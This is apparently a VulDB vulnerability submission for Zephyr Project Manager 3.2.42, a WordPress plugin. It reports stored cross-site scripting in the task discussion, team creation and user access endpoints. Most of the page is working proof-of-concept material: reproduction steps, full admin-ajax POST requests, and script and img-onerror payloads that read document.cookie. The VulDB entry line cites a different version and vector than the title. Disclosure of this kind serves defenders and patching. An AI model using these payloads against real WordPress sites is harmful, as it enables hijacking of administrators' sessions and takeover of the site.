Submit #45806: Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSSinfo

TitleZephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS
DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks. > It has been determined that in most places throughout the application, the data from the input field can be injected as html without any sanitization and validation. The details of the discovery are given below. ## Proof of Concept (PoC) The details of the various (Reflexted and Stored) XSS on the application are given below. ### Endpoint Of New Discussion For Task. (Stored XSS) Steps To Reproduce : 1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1 2. Click on Discussion tab. 3. Fill in payload in the comment field. 4. Click on "Comment". Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 108 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers user_id=1&subject=task&subject_id=213&message=%3cscript%3ealert(document.cookie)%3c%2fscript%3e&type=message&action=zpm_send_comment&zpm_nonce=22858bf3a7 Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e Parameter(s) : message ### Endpoint Of New Team and Team Update. (Stored XSS) Steps To Reproduce : 1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members 2. Click on "New Team" or "Edit Team". 3. Fill in payload in the team name and team description field. 4. Click on "Create Team". Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 136 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&description=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&action=zpm_add_team Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e Parameter(s) : name,description ### Endpoint Of User Access (Stored XSS) Steps To Reproduce : 1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members 2. Click on "Bulk Edit Access". 3. Choose any options. 4. Click on "Allow Access". 5. "access" parameter is intervened by proxy. 6. Click on "Create Team". Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1103 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers user_id%5B0%5D%5Bid%5D=1&user_id%5B0%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B0%5D%5Bname%5D=admin&user_id%5B0%5D%5Bdescription%5D=&user_id%5B0%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B0%5D%5Bcan_zephyr%5D=true&user_id%5B1%5D%5Bid%5D=1&user_id%5B1%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B1%5D%5Bname%5D=admin&user_id%5B1%5D%5Bdescription%5D=&user_id%5B1%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B1%5D%5Bcan_zephyr%5D=true&access=trueo6c2i%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3eb6lt4&action=zpm_update_user_access Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e Parameter(s) : access
Source⚠️ https://wpscan.com/vulnerability/bfd8a7aa-5977-4fe5-b2fc-12bf93caf3ed
User
 r1z4x (UID 31999)
Submission09/13/2022 14:39 (4 years ago)
Moderation09/23/2022 08:58 (10 days later)
StatusAccepted
VulDB entry209370 [Zephyr Project Manager up to 3.2.4 on WordPress REST Call /v1/tasks/create/ onanimationstart cross site scripting]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!